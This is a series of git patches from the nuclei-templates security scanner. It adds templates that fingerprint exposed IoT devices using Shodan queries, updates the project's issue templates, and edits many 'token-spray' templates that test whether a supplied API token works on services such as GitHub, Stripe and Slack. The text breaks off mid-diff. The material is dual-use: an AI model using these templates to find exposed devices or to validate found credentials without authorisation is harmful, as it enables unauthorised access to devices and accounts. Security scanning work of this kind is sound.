Thermostat"' + +requests: + - method: GET + path: + - '{{BaseURL}}/index.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Heatmiser Wifi Thermostat' + - type: status + status: + - 200 From d42570e060b3e97821fecaec144c75bf3d9c36a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Oct 2021 23:51:33 +0530 Subject: [PATCH 3040/4083] Create webcamxp-5.yaml --- iot/webcamxp-5.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/webcamxp-5.yaml diff --git a/iot/webcamxp-5.yaml b/iot/webcamxp-5.yaml new file mode 100644 index 0000000000..8b63f6cc6e --- /dev/null +++ b/iot/webcamxp-5.yaml @@ -0,0 +1,24 @@ +id: webcamxp-5 + +info: + name: webcamXP 5 + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7448 + tags: iot + metadata: + shodan: 'http.title:"webcamXP 5"' + +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'webcamXP 5' + - type: status + status: + - 200 From 05b9b8f99530b265c4b6b6d81fdbb430451881ee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Oct 2021 23:55:49 +0530 Subject: [PATCH 3041/4083] Create codian-mcu-login.yaml --- iot/codian-mcu-login.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/codian-mcu-login.yaml diff --git a/iot/codian-mcu-login.yaml b/iot/codian-mcu-login.yaml new file mode 100644 index 0000000000..56f05a6e19 --- /dev/null +++ b/iot/codian-mcu-login.yaml @@ -0,0 +1,24 @@ +id: codian-mcu-login + +info: + name: Codian MCU Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7404 + tags: iot + metadata: + shodan: 'http.title:"Codian MCU - Home page"' + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Codian MCU - login:' + - type: status + status: + - 200 From d6daa202be3e22dcd8cf4b69e2a3070e17643cc9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Oct 2021 00:01:16 +0530 Subject: [PATCH 3042/4083] Create envision-gateway.yaml --- iot/envision-gateway.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/envision-gateway.yaml diff --git a/iot/envision-gateway.yaml b/iot/envision-gateway.yaml new file mode 100644 index 0000000000..fb1440730d --- /dev/null +++ b/iot/envision-gateway.yaml @@ -0,0 +1,24 @@ +id: envision-gateway + +info: + name: EnvisionGateway + author: dhiyaneshDK + severity: low + reference: https://www.exploit-db.com/ghdb/7315 + tags: iot + metadata: + shodan: 'http.title:"EnvisionGateway"' + +requests: + - method: GET + path: + - '{{BaseURL}}/#' + + matchers-condition: and + matchers: + - type: word + words: + - 'EnvisionGateway' + - type: status + status: + - 200 From 46d9d958c9465d6e652246c0f8293fec95d32d07 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 19 Oct 2021 16:34:02 -0300 Subject: [PATCH 3043/4083] Update aviatrix-detect.yaml --- technologies/aviatrix-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml index 343b261d8b..bf67b451fd 100644 --- a/technologies/aviatrix-detect.yaml +++ b/technologies/aviatrix-detect.yaml @@ -4,8 +4,11 @@ info: name: Aviatrix Detect author: pikpikcu,philippedelteil severity: info + metadata: + shodan-query: https://www.shodan.io/search?query=http.title%3A%22Aviatrix+Controller%22 + shodan-query: https://www.shodan.io/search?query=http.title%3A%22Aviatrix+Cloud+Controller%22 tags: tech,aviatrix - + requests: - method: GET path: From 7a5bfb69a7556b7c705de671f6ccae650b0beaac Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 20 Oct 2021 01:10:43 +0530 Subject: [PATCH 3044/4083] misc update --- technologies/aviatrix-detect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml index bf67b451fd..64be83fd08 100644 --- a/technologies/aviatrix-detect.yaml +++ b/technologies/aviatrix-detect.yaml @@ -4,11 +4,10 @@ info: name: Aviatrix Detect author: pikpikcu,philippedelteil severity: info - metadata: - shodan-query: https://www.shodan.io/search?query=http.title%3A%22Aviatrix+Controller%22 - shodan-query: https://www.shodan.io/search?query=http.title%3A%22Aviatrix+Cloud+Controller%22 tags: tech,aviatrix - + metadata: + shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller" + requests: - method: GET path: From 6f2e88034d7f996682efe224f0d3731467709072 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 20 Oct 2021 05:54:00 +0530 Subject: [PATCH 3045/4083] issue template updates --- .github/ISSUE_TEMPLATE/bug_report.md | 32 ----------------------- .github/ISSUE_TEMPLATE/config.yml | 14 ++++++++++ .github/ISSUE_TEMPLATE/false-positive.md | 28 ++++++++------------ .github/ISSUE_TEMPLATE/feature_request.md | 22 +++++++++------- .github/ISSUE_TEMPLATE/issue-report.md | 21 +++++++++++++++ .github/ISSUE_TEMPLATE/submit-template.md | 22 +++++++++++----- 6 files changed, 73 insertions(+), 66 deletions(-) delete mode 100644 .github/ISSUE_TEMPLATE/bug_report.md create mode 100644 .github/ISSUE_TEMPLATE/config.yml create mode 100644 .github/ISSUE_TEMPLATE/issue-report.md diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md deleted file mode 100644 index c7e1e98e00..0000000000 --- a/.github/ISSUE_TEMPLATE/bug_report.md +++ /dev/null @@ -1,32 +0,0 @@ ---- -name: Bug report -about: Create a issue to help us improve -title: "[Bug] " -labels: '' -assignees: '' - ---- - -**Nuclei version** - -``` -nuclei -version -``` - -**Nuclei template version** - -``` -cat ~/.nuclei-config.json -``` - -**Describe the bug** -A clear and concise description of what the bug is. - -**Commands to reproduce** - -``` -nuclei -t xxx -target xxx -``` - -**Screenshots** -If applicable, add screenshots to help explain your problem. diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml new file mode 100644 index 0000000000..9d81aa509c --- /dev/null +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -0,0 +1,14 @@ +blank_issues_enabled: false + +contact_links: + - name: Ask an question / advise on using nuclei-templates + url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a + about: Ask a question or request support for using nuclei-templates + + - name: Share idea / feature to discuss for nuclei-templates + url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas + about: Share idea / feature to discuss for nuclei-templates + + - name: Connect with PD Team & Community (Discord) + url: https://discord.gg/projectdiscovery + about: Connect with PD Team & Community for direct communication \ No newline at end of file diff --git a/.github/ISSUE_TEMPLATE/false-positive.md b/.github/ISSUE_TEMPLATE/false-positive.md index 866365bd95..3cc006eb06 100644 --- a/.github/ISSUE_TEMPLATE/false-positive.md +++ b/.github/ISSUE_TEMPLATE/false-positive.md @@ -1,30 +1,24 @@ --- name: False Positive -about: 'Create an issue if you found false positive results. ' -title: "[false-positive] template-name " +about: 'Issue for template producing false positive results.' labels: 'false-positive' -assignees: '' --- -**Nuclei version** + -``` -nuclei -version -``` +### Nuclei Version: -**Nuclei template version** + -``` -cat ~/.nuclei-config.json -``` +### Template file: -**Template ID** + -Please submit the ID template producing false-positive results. +### Command to reproduce: -**Commands to Reproduce** + + -``` -nuclei -t template_id -target ? -``` +### Anything else: + \ No newline at end of file diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md index fbb3ffc5ad..cb6be4c6be 100644 --- a/.github/ISSUE_TEMPLATE/feature_request.md +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -1,16 +1,18 @@ --- name: Feature request -about: Suggest an idea to improve nuclei templates -title: "[Feature] " -labels: '' -assignees: '' - +about: Request feature to implement in this project +labels: 'Type: Enhancement' --- -**Is your feature request related to a problem? Please describe.** + -A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] +### Please describe your feature request: + -**Describe the solution you'd like** - -A clear and concise description of what you want to happen. +### Describe the use case of this feature: + diff --git a/.github/ISSUE_TEMPLATE/issue-report.md b/.github/ISSUE_TEMPLATE/issue-report.md new file mode 100644 index 0000000000..c6f6f07f53 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/issue-report.md @@ -0,0 +1,21 @@ +--- +name: Issue report +about: "Issue to report invalid template" +labels: 'Type: Bug' + +--- + + + + + +### Issue description: + + + +### Anything else: + \ No newline at end of file diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md index c929e00068..b7aa1c4938 100644 --- a/.github/ISSUE_TEMPLATE/submit-template.md +++ b/.github/ISSUE_TEMPLATE/submit-template.md @@ -1,15 +1,23 @@ --- -name: Submit Template -about: Submit nuclei template using issue -title: "[nuclei-template] template-name" +name: Template Contribution +about: Contributing nuclei template using GitHub Issue labels: 'nuclei-template' -assignees: '' - --- -**Template Details** +### Template Information: + + + + + +### Nuclei Template: + + + ```yaml -nuclei template goes here ``` + + + \ No newline at end of file From 4617e8fb069e3be5d858db742e372ee31b7b4d48 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 20 Oct 2021 14:16:18 +0530 Subject: [PATCH 3046/4083] more updates --- token-spray/asana.yaml | 4 ++-- token-spray/bingmaps.yaml | 2 +- token-spray/bitly.yaml | 2 +- token-spray/buildkite.yaml | 2 +- token-spray/buttercms.yaml | 2 +- token-spray/calendly.yaml | 2 +- token-spray/circleci.yaml | 2 +- token-spray/deviantart.yaml | 2 +- token-spray/dropbox.yaml | 2 +- token-spray/github.yaml | 2 +- token-spray/google-autocomplete.yaml | 2 +- token-spray/google-customsearch.yaml | 2 +- token-spray/google-directions.yaml | 2 +- token-spray/google-elevation.yaml | 2 +- token-spray/google-fcm.yaml | 2 +- token-spray/google-findplacefromtext.yaml | 2 +- token-spray/google-gedistancematrix.yaml | 2 +- token-spray/google-geocode.yaml | 2 +- token-spray/google-geolocation.yaml | 9 +++++---- token-spray/google-mapsembed.yaml | 2 +- token-spray/google-mapsembedadvanced.yaml | 2 +- token-spray/google-nearbysearch.yaml | 2 +- token-spray/google-nearestroads.yaml | 2 +- token-spray/google-placedetails.yaml | 2 +- token-spray/google-placesphoto.yaml | 2 +- token-spray/google-playablelocations.yaml | 2 +- token-spray/google-routetotraveled.yaml | 2 +- token-spray/google-speedlimit.yaml | 2 +- token-spray/google-staticmaps.yaml | 2 +- token-spray/google-streetview.yaml | 2 +- token-spray/google-timezone.yaml | 2 +- token-spray/googlet-extsearchplaces.yaml | 4 ++-- token-spray/heroku.yaml | 4 ++-- token-spray/hubspot.yaml | 2 +- token-spray/instagram.yaml | 2 +- token-spray/ipstack.yaml | 2 +- token-spray/iterable.yaml | 2 +- token-spray/jumpcloud.yaml | 2 +- token-spray/lokalise.yaml | 2 +- token-spray/loqate.yaml | 2 +- token-spray/mailchimp.yaml | 2 +- token-spray/mailgun.yaml | 2 +- token-spray/mapbox.yaml | 2 +- token-spray/nerdgraph.yaml | 2 +- token-spray/npm.yaml | 2 +- token-spray/openweather.yaml | 2 +- token-spray/pagerduty.yaml | 2 +- token-spray/pendo.yaml | 2 +- token-spray/pivotaltracker.yaml | 2 +- token-spray/postmark.yaml | 2 +- token-spray/sendgrid.yaml | 2 +- token-spray/slack.yaml | 2 +- token-spray/sonarcloud.yaml | 2 +- token-spray/spotify.yaml | 2 +- token-spray/square.yaml | 2 +- token-spray/stripe.yaml | 2 +- token-spray/tinypng.yaml | 2 +- token-spray/travisci.yaml | 2 +- token-spray/twitter.yaml | 2 +- token-spray/visualstudio.yaml | 2 +- token-spray/wakatime.yaml | 2 +- token-spray/weglot.yaml | 2 +- token-spray/youtube.yaml | 5 +++-- 63 files changed, 72 insertions(+), 70 deletions(-) diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml index 08645bbe99..482dc7bdd9 100644 --- a/token-spray/asana.yaml +++ b/token-spray/asana.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,asana +self-contained: true requests: - method: GET path: @@ -14,9 +15,8 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status + negative: true status: - 401 - negative: true diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml index 86e6784911..17c0d216aa 100644 --- a/token-spray/bingmaps.yaml +++ b/token-spray/bingmaps.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,bing,maps,bingmaps +self-contained: true requests: - method: GET path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml index 31eea7a7e7..01c70c7974 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/bitly.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,bitly +self-contained: true requests: - method: GET path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml index c2129bc7dd..350b8edd1b 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/buildkite.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buildkite +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml index f37c091c85..15d86d53fe 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/buttercms.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,buttercms +self-contained: true requests: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml index 1f2c1f434e..b54a5c8df8 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/calendly.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,calendly +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-Token: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml index 0e1d78ca22..d519f10651 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/circleci.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,circle,circleci +self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml index 96b90b34b1..ab73e7ea0d 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/deviantart.yaml @@ -7,13 +7,13 @@ info: severity: info tags: token-spray,deviantart +self-contained: true requests: - method: POST path: - "https://www.deviantart.com/api/v1/oauth2/placebo" body: "access_token={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml index e1f7bf1625..339837160e 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/dropbox.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,dropbox +self-contained: true requests: - method: POST path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/github.yaml b/token-spray/github.yaml index 944225f0fe..4722dfe6d3 100644 --- a/token-spray/github.yaml +++ b/token-spray/github.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,github +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64('user:' + token)}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml index d6fee5de42..ae81be1c96 100644 --- a/token-spray/google-autocomplete.yaml +++ b/token-spray/google-autocomplete.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,autocomplete +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml index 0a77ff06fb..61af504633 100644 --- a/token-spray/google-customsearch.yaml +++ b/token-spray/google-customsearch.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,search +self-contained: true requests: - method: GET path: - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml index 483224144e..97aaf95d6c 100644 --- a/token-spray/google-directions.yaml +++ b/token-spray/google-directions.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,directions +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml index a9b2e001c7..31b68e98de 100644 --- a/token-spray/google-elevation.yaml +++ b/token-spray/google-elevation.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,elevation +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml index ebb916fbe5..8ca7a1653f 100644 --- a/token-spray/google-fcm.yaml +++ b/token-spray/google-fcm.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,fcm,firebase,cloud,messaging +self-contained: true requests: - method: POST path: @@ -15,7 +16,6 @@ requests: Authorization: key={{token}} Content-Type: application/json - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml index 0a4a93b767..1fe4c209e8 100644 --- a/token-spray/google-findplacefromtext.yaml +++ b/token-spray/google-findplacefromtext.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,find,text +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml index 5eaf5abb5d..42987ebfe1 100644 --- a/token-spray/google-gedistancematrix.yaml +++ b/token-spray/google-gedistancematrix.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,distance,matrix +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml index 21d1ea1781..dbba7431d5 100644 --- a/token-spray/google-geocode.yaml +++ b/token-spray/google-geocode.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,geocode +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml index 07684fe0e1..a322b89967 100644 --- a/token-spray/google-geolocation.yaml +++ b/token-spray/google-geolocation.yaml @@ -6,20 +6,21 @@ info: severity: info tags: token-spray,google,geolocation +self-contained: true requests: - method: GET path: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - matchers-condition: and - self-contained: true + matchers-condition: and matchers: - type: word part: body + negative: true words: - 'error' - negative: true + - type: status + negative: true status: - 404 - negative: true diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml index d7d9c5e05f..f8689ae282 100644 --- a/token-spray/google-mapsembed.yaml +++ b/token-spray/google-mapsembed.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,maps,embed +self-contained: true requests: - method: GET path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml index 8fd69d623d..171ff4b005 100644 --- a/token-spray/google-mapsembedadvanced.yaml +++ b/token-spray/google-mapsembedadvanced.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,maps,embed +self-contained: true requests: - method: GET path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml index d40f6d479c..db0dda7fab 100644 --- a/token-spray/google-nearbysearch.yaml +++ b/token-spray/google-nearbysearch.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,search,nearby +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml index ab8ebf2b98..9551876122 100644 --- a/token-spray/google-nearestroads.yaml +++ b/token-spray/google-nearestroads.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,roads +self-contained: true requests: - method: GET path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 3a9935ba6a..2f6cf7d464 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,place,details +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml index 88790a68ec..6b6b3cd539 100644 --- a/token-spray/google-placesphoto.yaml +++ b/token-spray/google-placesphoto.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,places,photo +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml index e034096bfc..6dce339499 100644 --- a/token-spray/google-playablelocations.yaml +++ b/token-spray/google-playablelocations.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,playable,locations +self-contained: true requests: - method: GET path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml index 4efb960afd..2c0853eda0 100644 --- a/token-spray/google-routetotraveled.yaml +++ b/token-spray/google-routetotraveled.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,route +self-contained: true requests: - method: GET path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml index dd06969472..e5e8290a6a 100644 --- a/token-spray/google-speedlimit.yaml +++ b/token-spray/google-speedlimit.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,speed,limit +self-contained: true requests: - method: GET path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml index 5011053baf..ba4ee679ca 100644 --- a/token-spray/google-staticmaps.yaml +++ b/token-spray/google-staticmaps.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,maps +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml index cc0344919f..d7156a7295 100644 --- a/token-spray/google-streetview.yaml +++ b/token-spray/google-streetview.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,streetview +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml index 33f8002db5..40b13b61ca 100644 --- a/token-spray/google-timezone.yaml +++ b/token-spray/google-timezone.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,timezone +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml index 29e5fcca5a..290da60328 100644 --- a/token-spray/googlet-extsearchplaces.yaml +++ b/token-spray/googlet-extsearchplaces.yaml @@ -6,15 +6,15 @@ info: severity: info tags: token-spray,google,search,places,text +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" - self-contained: true matchers: - type: word part: body + negative: true words: - 'error_message' - negative: true diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml index ec76722f11..ef81ec91e8 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/heroku.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,heroku +self-contained: true requests: - method: POST path: @@ -15,12 +16,11 @@ requests: Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} - self-contained: true matchers: - type: status + condition: or status: - 200 - 201 - 202 - 206 - condition: or diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml index b1a796d113..da95a4b12a 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/hubspot.yaml @@ -7,13 +7,13 @@ info: severity: info tags: token-spray,hubspot +self-contained: true requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml index 8ab1b9131d..dd851bee3e 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/instagram.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,instagram,graph +self-contained: true requests: - method: GET path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml index 4c912bf0b7..ac527d2a1e 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/ipstack.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,ipstack +self-contained: true requests: - method: GET path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index a4d77e7575..69da55de5d 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,iterable +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Api_Key: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml index cdfbdba931..dbf3c9ab35 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/jumpcloud.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,jumpcloud +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-Api-Key: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml index 5ca1351c6d..5003f25b31 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/lokalise.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,lokalise +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-Api-Token: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml index 